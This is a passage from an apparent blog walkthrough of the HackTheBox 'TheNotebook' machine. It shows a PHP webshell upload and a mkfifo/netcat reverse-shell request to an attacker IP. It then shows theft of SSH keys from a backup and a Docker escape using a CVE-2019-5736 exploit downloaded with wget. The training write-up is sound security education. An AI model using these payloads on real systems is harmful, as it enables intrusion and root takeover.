    <p><img src="https://i.imgur.com/fgI2wmr.png" alt="HTB TheNotebook - File Upload" class="align-center"></p>

    <ul>
      <li>
        <p>Creating a simple webshell with the content <code class="language-plaintext highlighter-rouge">&lt;?php system($_GET['cmd']);?&gt;</code>, made its upload and didn’t received any warning or block during the action.</p>
      </li>
      <li>
        <p>After uploading it, the file was listed on the page, and hitting the <em>View</em> butting, we were redirected to the path where the file was, allowing us to see the rendered content.</p>
      </li>
    </ul>

    <p><img src="https://i.imgur.com/aCdIwnN.png" alt="HTB TheNotebook - Uploaded Files" class="align-center"></p>

    <ul>
      <li>Adding a simple query string at its end, as expected by our simple web shell, to run the id command (<code class="language-plaintext highlighter-rouge">cmd=id</code>) and we could confirm that we have code execution in the server <img class="emoji" title=":smiley:" alt=":smiley:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f603.png" height="20" width="20">
</li>
    </ul>

    <p><img src="https://i.imgur.com/eSH3rQY.png" alt="HTB TheNotebook - Simple WebShell" class="align-center"></p>

    <ul>
      <li>To get a reverse shell, configured a listener and then sent another payload, this time to get a TCP connection from the server, which worked as expected <img class="emoji" title=":smile:" alt=":smile:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f604.png" height="20" width="20">
</li>
    </ul>
  </li>
</ul>

<div class="language-http highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">GET</span> <span class="nn">/1e49f8a12603040cc99b2dd39f423b09.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2&gt;%261|nc+10.10.10.10+4443+&gt;/tmp/f</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="p">:</span> <span class="s">10.10.10.230</span>
<span class="na">Upgrade-Insecure-Requests</span><span class="p">:</span> <span class="s">1</span>
<span class="na">User-Agent</span><span class="p">:</span> <span class="s">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36</span>
<span class="na">Accept</span><span class="p">:</span> <span class="s">text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span>
<span class="na">Accept-Encoding</span><span class="p">:</span> <span class="s">gzip, deflate</span>
<span class="na">Accept-Language</span><span class="p">:</span> <span class="s">en-US,en;q=0.9</span>
<span class="na">Cookie</span><span class="p">:</span> <span class="s">auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Imh0dHA6Ly8xMC4xMC4xNC4xMTY6NzA3MC9wcml2S2V5LmtleSJ9.eyJ1c2VybmFtZSI6Impkb2UiLCJlbWFpbCI6Impkb2VAZHVtbXkuY29tIiwiYWRtaW5fY2FwIjoxfQ.WMokYjjMMECoF2UWM2fcMVcR99X34dHXwuj8nXqBlQWOnwC1NdBoO6PD-ZHjAZ5p969Jbf4XnRKZedAAokxvIgG2ymYNV1F8CcDzDfuHlMlk_CiYGvimoJWgvA3S-24KDql2bRrvJgoPbKKjqJ5Ir7mWZF1USGSwsttc9Ff1qniFAWTJ8CXkTLtfR498_rY_uIJfBdvqTbi3C9fWJcnSwjCGROkEGxCYve4cf5rjFvm_D_G5-S8oWkXICYAFp5lMQ288E0qGQp04nD16H1v2YzOROolNDeqMVB2uaI060xjKEA8mv6taa095q7rEqzpzXSj21Uq2-xcZonk0LI1-yg; uuid=d3f32390-d9e4-4eb0-b1a0-788b54fd8278</span>
<span class="na">Connection</span><span class="p">:</span> <span class="s">close</span>
</code></pre></div></div>

<h2 id="user-flag">User flag</h2>

<p>After obtaining the reverse shell, started enumerating the box with the account <code class="language-plaintext highlighter-rouge">www-data</code>, which is the one used by the web server execution. The following items stood out from the others listed during <code class="language-plaintext highlighter-rouge">linpeas.sh</code> execution:</p>

<ul>
  <li>
    <p>Users with console and their permissions</p>

    <ul>
      <li><code class="language-plaintext highlighter-rouge">noah:x:1000:1000:Noah:/home/noah:/bin/bash</code></li>
      <li><code class="language-plaintext highlighter-rouge">root:x:0:0:root:/root:/bin/bash</code></li>
    </ul>
  </li>
  <li>
    <p>Existence of <code class="language-plaintext highlighter-rouge">/var/backups</code> folder, also mentioned in the previously seen notes.</p>
  </li>
</ul>

<p>As this was previously mentioned, started by inspecting the contents of <code class="language-plaintext highlighter-rouge">/var/backups</code>, where most of the files we couldn’t read except for the <code class="language-plaintext highlighter-rouge">home.tar.gz</code>, which could have some interesting information.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@thenotebook:/var/backups<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
total 696
drwxr-xr-x  2 root root     4096 Jun 11 06:26 <span class="nb">.</span>
drwxr-xr-x 14 root root     4096 Feb 12 06:52 ..
<span class="nt">-rw-r--r--</span>  1 root root    51200 Jun 11 06:25 alternatives.tar.0
<span class="nt">-rw-r--r--</span>  1 root root    33252 Feb 24 08:53 apt.extended_states.0
<span class="nt">-rw-r--r--</span>  1 root root     3609 Feb 23 08:58 apt.extended_states.1.gz
<span class="nt">-rw-r--r--</span>  1 root root     3621 Feb 12 06:52 apt.extended_states.2.gz
<span class="nt">-rw-r--r--</span>  1 root root      437 Feb 12 06:17 dpkg.diversions.0
<span class="nt">-rw-r--r--</span>  1 root root      172 Feb 12 06:52 dpkg.statoverride.0
<span class="nt">-rw-r--r--</span>  1 root root   571460 Feb 24 08:53 dpkg.status.0
<span class="nt">-rw-------</span>  1 root root      693 Feb 17 13:18 group.bak
<span class="nt">-rw-------</span>  1 root shadow    575 Feb 17 13:18 gshadow.bak
<span class="nt">-rw-r--r--</span>  1 root root     4373 Feb 17 09:02 home.tar.gz
<span class="nt">-rw-------</span>  1 root root     1555 Feb 12 06:24 passwd.bak
<span class="nt">-rw-------</span>  1 root shadow   1024 Feb 12 07:33 shadow.bak
</code></pre></div></div>

<p>Expanding the archive, noticed that the folder structure was from <code class="language-plaintext highlighter-rouge">noah</code>’s home directory, including some ssh keys that might be useful.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">tar</span> <span class="nt">-xzvf</span> home.tar.gz
home/
home/noah/
home/noah/.bash_logout
home/noah/.cache/
home/noah/.cache/motd.legal-displayed
home/noah/.gnupg/
home/noah/.gnupg/private-keys-v1.d/
home/noah/.bashrc
home/noah/.profile
home/noah/.ssh/
home/noah/.ssh/id_rsa
home/noah/.ssh/authorized_keys
home/noah/.ssh/id_rsa.pub
</code></pre></div></div>

<p>Using the key found, was able to connect using SSH as noah and retrieve the user flag.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>ssh <span class="nt">-i</span> id_rsa noah@10.10.10.230
noah@thenotebook:~<span class="nv">$ </span><span class="nb">cat </span>user.txt
&lt;redacted&gt;
</code></pre></div></div>

<h2 id="root-flag">Root flag</h2>

<p>As usual, before giving another try with <code class="language-plaintext highlighter-rouge">linenum.sh</code> with different privileges, ran <code class="language-plaintext highlighter-rouge">sudo -l</code> which returned the following content:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>noah@thenotebook:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>noah on thenotebook:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User noah may run the following commands on thenotebook:
    <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: /usr/bin/docker <span class="nb">exec</span> <span class="nt">-it</span> webapp-dev01<span class="k">*</span>
</code></pre></div></div>

<p>As we have access to run any command in the docker container with <strong>exec</strong>, began by entering in an interactive shell as the command below.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> /usr/bin/docker <span class="nb">exec</span> <span class="nt">-it</span> webapp-dev01 bash
</code></pre></div></div>

<p>Inside the container, was able to see the files used while publishing the website, where we can look for sensitive information</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@7228ddf52a0f:/opt/webapp# <span class="nb">ls</span> <span class="nt">-la</span>
total 2244
drwxr-xr-x 1 root root    4096 Jun 11 07:04 <span class="nb">.</span>
drwxr-xr-x 1 root root    4096 Feb 12 07:30 ..
drwxr-xr-x 1 root root    4096 Feb 12 07:30 __pycache__
drwxr-xr-x 3 root root    4096 Nov 18  2020 admin
<span class="nt">-rw-r--r--</span> 1 root root    3303 Nov 16  2020 create_db.py
<span class="nt">-rwxr-xr-x</span> 1 root root 2236814 Jun 11 07:04 main
<span class="nt">-rw-r--r--</span> 1 root root    9517 Feb 11 15:00 main.py
<span class="nt">-rw-------</span> 1 root root    3247 Feb 11 15:09 privKey.key
<span class="nt">-rw-r--r--</span> 1 root root      78 Feb 12 07:12 requirements.txt
drwxr-xr-x 3 root root    4096 Nov 19  2020 static
drwxr-xr-x 2 root root    4096 Nov 18  2020 templates
<span class="nt">-rw-r--r--</span> 1 root root      20 Nov 20  2020 webapp.tar.gz
</code></pre></div></div>

<p>Checking the content of these files, in <code class="language-plaintext highlighter-rouge">create_db.py</code> noticed two password hashes for users <code class="language-plaintext highlighter-rouge">noah</code> and <code class="language-plaintext highlighter-rouge">admin</code>, which I decided to search on the internet first if they have already been cracked.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">users</span> <span class="o">=</span> <span class="p">[</span>
        <span class="nc">User</span><span class="p">(</span><span class="n">username</span><span class="o">=</span><span class="sh">'</span><span class="s">admin</span><span class="sh">'</span><span class="p">,</span> <span class="n">email</span><span class="o">=</span><span class="sh">'</span><span class="s">admin@thenotebook.local</span><span class="sh">'</span><span class="p">,</span> <span class="n">uuid</span><span class="o">=</span><span class="n">admin_uuid</span><span class="p">,</span> <span class="n">admin_cap</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="sh">"</span><span class="s">0d3ae6d144edfb313a9f0d32186d4836791cbfd5603b2d50cf0d9c948e50ce68</span><span class="sh">"</span><span class="p">),</span>
        <span class="nc">User</span><span class="p">(</span><span class="n">username</span><span class="o">=</span><span class="sh">'</span><span class="s">noah</span><span class="sh">'</span><span class="p">,</span> <span class="n">email</span><span class="o">=</span><span class="sh">'</span><span class="s">noah@thenotebook.local</span><span class="sh">'</span><span class="p">,</span> <span class="n">uuid</span><span class="o">=</span><span class="n">noah_uuid</span><span class="p">,</span> <span class="n">password</span><span class="o">=</span><span class="sh">"</span><span class="s">e759791d08f3f3dc2338ae627684e3e8a438cd8f87a400cada132415f48e01a2</span><span class="sh">"</span><span class="p">)</span>
    <span class="p">]</span>
</code></pre></div></div>

<p>As haven’t found anything in public sites (Crackstation, for example) this means that these passwords are not present in known wordlists like <code class="language-plaintext highlighter-rouge">rockyou.txt</code>, frequently used in CTFs. Decided to go further enumerating for other vulnerabilities in docker, specifically <em>docker breakout</em>, allowing us to escape to the host.</p>

<p>Searching for some information, found the repo <a href="https://github.com/stealthcopter/deepce">stealthcopter/deepce: Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE) (github.com)</a> where there’s a script that can help us enumerate the container characteristics known to be helpful in this kind of situation.</p>

<p>Executing it in the container, noticed that we could have a chance on doing it as there were capabilities (in red) that could allow us to read and write files in the host, but using the options in the tool didn’t allow me to achieve the expected outcome.</p>

<p><img src="https://i.imgur.com/0L7480D.png" alt="HTB TheNotebook - deepce output" class="align-center"></p>

<p>As I haven’t found anything in the files, decided to search for specific vulnerabilities that could abuse capabilities like the ones we have found, where I found about CVE-2019-5736 while browsing for docker vulns in <a href="https://www.cvedetails.com/">CVE Details</a>. This vuln represents exactly the type of abuse we need based on our situation and, due to its high CVSS score (9.3) probably there is a ready exploit to be used.</p>

<p><img src="https://i.imgur.com/CqvPKK3.png" alt="CVE Details - CVE-2019-5736" class="align-center"></p>

<p>Searching for exploits I came across the repo <a href="https://github.com/Frichetten/CVE-2019-5736-PoC">Frichetten/CVE-2019-5736-PoC: PoC for CVE-2019-5736 (github.com)</a> which had a PoC written in Golang that supposedly would attend to our scenario, while other PoCs found required us to be able to run other containers (<code class="language-plaintext highlighter-rouge">docker run</code>) in the host, not covered by our sudo privileges.</p>

<p>To obtain the root shell, the following steps were executed, as also seen in this blog post (<a href="https://www.programmersought.com/article/71804432772/">Reproduction of docker escape vulnerability (CVE-2019-5736) - Programmer Sought</a>)</p>

<ul>
  <li>
    <p>Downloaded and edited the script <code class="language-plaintext highlighter-rouge">escape.go</code> to give us a reverse shell.</p>
  </li>
  <li>
    <p>Compiled it using the parameters below</p>
  </li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">CGO_ENABLED</span><span class="o">=</span>0 <span class="nv">GOOS</span><span class="o">=</span>linux <span class="nv">GOARCH</span><span class="o">=</span>amd64 go build escape.go
</code></pre></div></div>

<ul>
  <li>Copied the exploit to the victim machine, inside the container, followed by its execution</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>wget http://10.10.10.10/escape
<span class="nb">chmod</span> +x escape
./escape
</code></pre></div></div>

<ul>
  <li>Once the exploit replaces the file <code class="language-plaintext highlighter-rouge">/bin/sh</code> with the malicious script, execute the command line below to trigger the exploration</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> /usr/bin/docker <span class="nb">exec</span> <span class="nt">-it</span> webapp-dev01 /bin/sh
</code></pre></div></div>

<p>After this execution, was received a reverse shell in the listener previously configured and was able to get the root’s flag</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">sudo </span>nc <span class="nt">-lnvp</span> 8080
listening on <span class="o">[</span>any] 8080 ...
connect to <span class="o">[</span>10.10.10.10] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.230] 35856
bash: cannot <span class="nb">set </span>terminal process group <span class="o">(</span>1617<span class="o">)</span>: Inappropriate ioctl <span class="k">for </span>device
bash: no job control <span class="k">in </span>this shell
&lt;4de4eaff90e275467ff2103ff7b6eb2b1ffaf63d44f72a2b2# <span class="nb">id
id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
root@thenotebook:/root# <span class="nb">cat </span>root.txt
<span class="se">\c</span>at root.txt
&lt;redacted&gt;
</code></pre></div></div>

<p>I hope you guys have enjoyed it!</p>

<p>See you in the next post <img class="emoji" title=":smiley:" alt=":smiley:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f603.png" height="20" width="20"></p>

        
      </section>

      <footer class="page__meta">
        
        
  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      <a href="/en-US/tag/#hackthebox" class="page__taxonomy-item p-category" rel="tag">HackTheBox</a><span class="sep">, </span>
    
      <a href="/en-US/tag/#htb-linux" class="page__taxonomy-item p-category" rel="tag">HTB Linux</a><span class="sep">, </span>
    
      <a href="/en-US/tag/#htb-medium" class="page__taxonomy-item p-category" rel="tag">HTB Medium</a>
    
    </span>
  </p>




  


  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categories: </strong>
    <span itemprop="keywords">
    
      <a href="/en-US/categories/#walkthrough" class="page__taxonomy-item p-category" rel="tag">Walkthrough</a>
    
    </span>
  </p>


        

  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time class="dt-published" datetime="2021-07-31T09:00:00-03:00">July 31, 2021</time></p>

      </footer>

      <section class="page__share" id="sharelinks">
  
    <h4 class="page__share-title">Share on</h4>
  

  <!-- CUSTOM: Localized sharing links -->
  

  <a href="https://twitter.com/intent/tweet?via=zerahzurc&amp;text=Walktrough%3A+HTB+TheNotebook%20https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F07%2Fhtb-thenotebook" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F07%2Fhtb-thenotebook" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F07%2Fhtb-thenotebook" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>

  <a href="whatsapp://send?text=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F07%2Fhtb-thenotebook" data-action="share/whatsapp/share" class="btn btn--whatsapp" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Whatsapp"><i class="fab fa-fw fa-whatsapp" aria-hidden="true"></i><span> Whatsapp</span></a>

  <a href="https://telegram.me/share/url?url=https%3A%2F%2Fdavicruz.com%2Fwalkthrough%2F2021%2F07%2Fhtb-thenotebook&amp;text=Walktrough%3A+HTB+TheNotebook" class="btn btn--telegram" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Telegram"><i class="fab fa-fw fa-telegram-plane" aria-hidden="true"></i><span> Telegram</span></a>

  <!-- END CUSTOM: Localized sharing links -->
</section>


      
  <nav class="pagination">
    
    
      <a href="/en-US/walkthrough/2021/07/htb-ophiuchi" class="pagination--pager" title="Walktrough: HTB Ophiuchi
">Previous</a>
    
    
    
      
        <a href="/en-US/walkthrough/2021/08/htb-knife" class="pagination--pager" title="Walktrough: HTB Knife
">Next</a>
      
    
  </nav>

    </div>

    
      <div class="page__comments">
  
  
      <h4 class="page__comments-title">Leave a comment</h4>
      <section id="utterances-comments"></section>
    
</div>

    
  </article>

  
  
    <div class="page__related">
      <h2 class="page__related-title">You may also enjoy</h2>
      <div class="grid__wrapper">
        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/TJKS5F6.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      

      
        <a href="/en-US/walkthrough/2021/10/htb-explore" rel="permalink">Walktrough: HTB Explore
</a>
      

      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-30T13:00:00-03:00">October 30, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          4 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/07/htb-thenotebook">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Explore, an easy-rated Android box from Hack The Box, created by bertolis.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/89b1SdH.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      

      
        <a href="/en-US/walkthrough/2021/10/htb-dynstr" rel="permalink">Walktrough: HTB Dynstr
</a>
      

      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-16T13:00:00-03:00">October 16, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          9 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/07/htb-thenotebook">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Dynstr, another medium-rated Linux box from Hack The Box, created by jkr.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/JkBtXmO.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      

      
        <a href="/en-US/walkthrough/2021/10/htb-cap" rel="permalink">Walktrough: HTB Cap
</a>
      

      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-10-02T13:00:00-03:00">October 2, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          6 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/07/htb-thenotebook">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Cap, another easy-rated Linux box from Hack The Box, created by InfoSecJack.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/pUqq7fY.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      <!-- CUSTOM: Use localized link to posts in archive page -->
      

      
        <a href="/en-US/walkthrough/2021/09/htb-pit" rel="permalink">Walktrough: HTB Pit
</a>
      

      
      <!-- END CUSTOM: Use localized link to posts in archive page-->
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-09-25T09:00:00-03:00">September 25, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          11 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/07/htb-thenotebook">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Pit, another medium-rated Linux box from Hack The Box, created by polarbearer and GibParadox.
</p>
  </article>
</div>

        
      </div>
    </div>
  
  
</div>

    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap">
<form class="search-content__form" onkeydown="return event.key != 'Enter';" role="search">
    <label class="sr-only" for="search">
      Enter your search term...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Enter your search term...">
  </form>
  <div id="results" class="results"></div>
</div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- Mermaid.js -->
<script type="module">
    import mermaid from 'https://unpkg.com/mermaid@9/dist/mermaid.esm.min.mjs';
    const config = {
        "theme": "dark", 
        "startOnLoad": true
    };
    mermaid.initialize(config);
</script>

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">
    
      <li><strong>Follow:</strong></li>
    

    
      
        
          <li><a href="https://www.linkedin.com/in/davicruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i> Linkedin</a></li>
        
      
        
          <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i> Twitter</a></li>
        
      
        
          <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-github" aria-hidden="true"></i> GitHub</a></li>
        
      
    
    <!-- start custom: Fix Atom Feed, add Privacy, Consent and Read in other languages -->
    
      <li><a href="/en-US/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
    
    <li><a href="https://davicruz.com/en-US/terms-and-privacy/" rel="nofollow noopener noreferrer"><i class="fas fa-user-shield" aria-hidden="true"></i> Terms of Service and Privacy Policy</a></li>
    <!--<li><a onclick="return klaro.show();"><i class="fas fa-shield-alt" aria-hidden="true"></i> Review consent</a></li>-->
    
      
        
          <li><a href="/">Disponível também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></li>
        
        
        
      
    
      
    
    <!-- end custom: Fix Atom Feed, add Privacy, Consent and Read in other languages -->
  </ul>
</div>

<div class="page__footer-copyright">© 2023 Davi Cruz. Powered by <a href="https://jekyllrb.com" rel="nofollow">Jekyll</a> &amp; <a href="https://mademistakes.com/work/minimal-mistakes-jekyll-theme/" rel="nofollow">Minimal Mistakes</a> &amp; <a href="https://github.com/kurtsson/jekyll-multiple-languages-plugin" rel="nofollow">Multiple Languages Plugin</a>.</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>




  <!-- start custom analytics snippet -->

<!-- end custom analytics snippet -->





    <script>
  'use strict';

  (function() {
    var commentContainer = document.querySelector('#utterances-comments');

    if (!commentContainer) {
      return;
    }

    var script = document.createElement('script');
    script.setAttribute('src', 'https://utteranc.es/client.js');
    script.setAttribute('repo', 'davi-cruz/davi-cruz-blog');
    // CUSTOM : Utterances post mapping due to Jekyll Multilanguage
    script.setAttribute('issue-term', 'htb-thenotebook');
    
    script.setAttribute('theme', 'github-dark');
    script.setAttribute('crossorigin', 'anonymous');

    commentContainer.appendChild(script);
  })();
</script>

  





  </body>
</html>
